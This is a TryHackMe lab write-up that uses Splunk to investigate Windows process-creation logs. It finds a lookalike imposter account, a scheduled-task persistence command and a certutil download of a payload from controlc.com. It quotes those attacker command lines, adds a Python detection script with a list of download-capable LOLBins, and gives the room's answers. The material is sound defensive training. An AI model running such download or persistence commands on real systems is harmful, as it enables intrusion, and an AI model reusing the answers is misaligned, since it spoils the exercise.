Benign - TryHackMe

Forrest Caffray

Link to room: https://tryhackme.com/room/benign

One of the client’s IDS indicated a potentially suspicious process execution indicating one of the hosts from the HR department was compromised. Some tools related to network information gathering / scheduled tasks were executed which confirmed the suspicion. Due to limited resources, we could only pull the process execution logs with Event ID: 4688 and ingested them into Splunk with the index win_eventlogs for further investigation.


How many logs are ingested from the month of March, 2022?

Set index="win_eventlogs" in a new search and restrict the time range picker to March 2022 (1 March to 31 March inclusive). The event count shown in the results is:

= 13959


Imposter Alert: There seems to be an imposter account observed in the logs, what is the name of that user?

To find this I filtered via the UserName field, then looked at the Rare values and noticed this:

There is a UserName of Amelia, which seems innocent enough, but there is also a UserName of Amel1a, with the digit 1 in place of the letter l. A lookalike of an existing account with only a handful of events is a classic imposter pattern.

= Amel1a


Which user from the HR department was observed to be running scheduled tasks?

I searched for index="win_eventlogs" schtasks as a sort of blanket to see what pops up.

I got 87 events, so still a bit too much to look through. We are looking for which user, so I clicked on UserName in Fields and spotted this:

Just one count for Chris.fort, with this CommandLine being of interest:

CommandLine: /create /tn OfficUpdater /tr "C:\Users\Chris.fort\AppData\Local\Temp\update.exe" /sc onstart

This is textbook persistence: a task named to look like an Office updater, whose action is an executable in the user's Temp directory, scheduled with /sc onstart so it runs every time the host boots.

= Chris.fort


Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host?

There is a hint to check out https://lolbas-project.github.io/, so let’s go ahead and do just that! LOLBAS catalogues binaries, scripts and libraries that ship with Windows by default and that an attacker can abuse (for example to download, execute or proxy code) without dropping any tooling of their own.

We are also looking at the HR department, which consists of:

  • Haroon

  • Chris

  • Diana

So we are looking for Haroon, Chris or Diana running one of the LOLBAS binaries listed on the github.io page. There are too many results to filter via UserName in this instance, and too many candidate LOLBIN processes to search for one at a time.

However, we know that they downloaded a payload, so an elegant way of filtering is to search for a URL in the command line by adding:

CommandLine="*http*" OR CommandLine="*https*"

(The first wildcard already matches https URLs, so the OR is redundant, but it does no harm.) Indeed we get one result, from Haroon:

 { [-]
   Category: Process Creation
   Channel: Windows
   CommandLine:  certutil.exe -urlcache -f - https://controlc.com/e4d11035 benign.exe
   EventID: 4688
   EventTime: 2022-03-04T10:38:28Z
   EventType: AUDIT_SUCCESS
   HostName: HR_01
   NewProcessId: 0x82194b
   Opcode: Info
   ProcessID: 9912
   ProcessName: C:\Windows\System32\certutil.exe
   Severity: INFO
   SeverityValue: 2
   SourceModuleName: eventlog
   SourceModuleType: Win_event_log
   SourceName: Microsoft-Windows-Security-Auditing
   SubjectDomainName: cybertees.local
   UserName: haroon
   index: winlogs
}

The interesting part is the command line:

CommandLine: certutil.exe -urlcache -f - https://controlc.com/e4d11035 benign.exe

We can see they used certutil.exe, which is listed on the LOLBAS page with the description “Windows binary used for handling certificates”. Here -urlcache -f forces certutil to fetch the URL, and the trailing argument is the local file name the content is written to, so a certificate tool is being used as a downloader.

= haroon
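The two searches above (the schtasks hunt and the CommandLine="*http*" filter) can be turned into reusable triage rules. The following added example is my own code, not part of the original write-up or the room: it parses EventID 4688 records in the "Key: value" layout Splunk showed for the event above, restricts them to a date window, and flags (a) download-capable LOLBins launched with a URL, extracting the binary, site, URL and output file, and (b) schtasks /create commands that point at a Temp path or use a boot/logon trigger. The certutil and schtasks command lines are the ones quoted in the write-up; the third event and every other field value are constructed for the example.

```python
import re
from datetime import date, datetime
from typing import Optional
from urllib.parse import urlparse

# Constructed EventID 4688 records in the "Key: value" layout Splunk showed
# for the page's event. The certutil and schtasks command lines are the ones
# quoted in the write-up; the third event and all other field values are
# made up for this example.
RAW_EVENTS = r"""
EventTime: 2022-03-04T10:38:28Z
HostName: HR_01
UserName: haroon
ProcessName: C:\Windows\System32\certutil.exe
CommandLine: certutil.exe -urlcache -f - https://controlc.com/e4d11035 benign.exe

EventTime: 2022-03-04T11:02:10Z
HostName: HR_02
UserName: Chris.fort
ProcessName: C:\Windows\System32\schtasks.exe
CommandLine: schtasks /create /tn OfficUpdater /tr "C:\Users\Chris.fort\AppData\Local\Temp\update.exe" /sc onstart

EventTime: 2022-02-20T08:15:00Z
HostName: IT_07
UserName: svc_build
ProcessName: C:\Windows\System32\certutil.exe
CommandLine: certutil.exe -urlcache -split -f https://files.example.com/tools.zip tools.zip
"""

# Download-capable LOLBins from the LOLBAS project (assumed short list).
DOWNLOAD_LOLBINS = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "regsvr32.exe",
                    "rundll32.exe", "powershell.exe", "msiexec.exe", "curl.exe"}
URL_RE = re.compile(r"""https?://[^\s"']+""")


def parse_events(text: str) -> list:
    """Split blank-line-separated blocks of 'Key: value' lines into dicts."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        event = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            event[key.strip()] = value.strip()
        events.append(event)
    return events


def image_name(ev: dict) -> str:
    """Base name of the executed image, lower-cased (e.g. 'certutil.exe')."""
    return ev.get("ProcessName", "").rsplit("\\", 1)[-1].lower()


def flag_lolbin_download(ev: dict) -> Optional[dict]:
    """Finding when a download-capable LOLBin is launched with a URL argument.
    The page's CommandLine="*http*" filter, narrowed to known downloaders,
    with the URL, site and local file name pulled out of the command line."""
    if image_name(ev) not in DOWNLOAD_LOLBINS:
        return None
    match = URL_RE.search(ev.get("CommandLine", ""))
    if not match:
        return None
    url = match.group(0)
    args = ev["CommandLine"].split()
    idx = args.index(url)
    saved_as = args[idx + 1] if idx + 1 < len(args) else None  # certutil style: file after URL
    return {"rule": "lolbin_download", "user": ev["UserName"], "host": ev["HostName"],
            "date": ev["EventTime"][:10], "binary": image_name(ev), "url": url,
            "site": urlparse(url).hostname, "saved_as": saved_as}


def flag_persistence_task(ev: dict) -> Optional[dict]:
    """Finding when schtasks /create runs something from a Temp directory or
    uses a boot/logon trigger, the persistence pattern seen in the write-up."""
    cmd = ev.get("CommandLine", "")
    if image_name(ev) != "schtasks.exe" or "/create" not in cmd.lower():
        return None
    action = re.search(r'/tr\s+(?:"([^"]+)"|(\S+))', cmd, re.I)
    trigger = re.search(r"/sc\s+(\S+)", cmd, re.I)
    name = re.search(r"/tn\s+(\S+)", cmd, re.I)
    path = (action.group(1) or action.group(2)) if action else ""
    sc = trigger.group(1).lower() if trigger else ""
    if "\\temp\\" not in path.lower() and sc not in {"onstart", "onlogon"}:
        return None
    return {"rule": "scheduled_task_persistence", "user": ev["UserName"],
            "host": ev["HostName"], "date": ev["EventTime"][:10],
            "task_name": name.group(1) if name else None, "action": path, "trigger": sc}


def triage(text: str, start: Optional[str] = None, end: Optional[str] = None) -> list:
    """Run both rules over events whose EventTime date is in [start, end);
    start and end are ISO dates such as "2022-03-01"."""
    start_d = date.fromisoformat(start) if start else None
    end_d = date.fromisoformat(end) if end else None
    findings = []
    for ev in parse_events(text):
        when = datetime.strptime(ev["EventTime"], "%Y-%m-%dT%H:%M:%SZ").date()
        if (start_d and when < start_d) or (end_d and when >= end_d):
            continue
        for rule in (flag_lolbin_download, flag_persistence_task):
            finding = rule(ev)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in triage(RAW_EVENTS, "2022-03-01", "2022-04-01"):
        print(finding)
```

One caveat when running this against real 4688 data: the CommandLine field is only present if "Include command line in process creation events" is enabled in audit policy. Without it, both rules are blind, which is exactly why that setting matters for this kind of investigation.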


To bypass the security controls, which system process (lolbin) was used to download a payload from the internet?

Well, we already answered this!

= certutil.exe


What was the date that this binary was executed by the infected host? format (YYYY-MM-DD)

We can look at the exact same results and notice this line:

EventTime: 2022-03-04T10:38:28Z

= 2022-03-04


Which third-party site was accessed to download the malicious payload?

Again, all the information is there, looking at:

CommandLine: certutil.exe -urlcache -f - https://controlc.com/e4d11035 benign.exe

= controlc.com


What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?

We can see from:

CommandLine: certutil.exe -urlcache -f - https://controlc.com/e4d11035 benign.exe

= benign.exe


The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?

For this one I just navigated to https://controlc.com/e4d11035

Upon finding the flag

= THM{________}


What is the URL that the infected host connected to?

We already know this :)

= https://controlc.com/e4d11035


I enjoyed this wee exercise getting more familiar with Splunk, hope this write up helped!
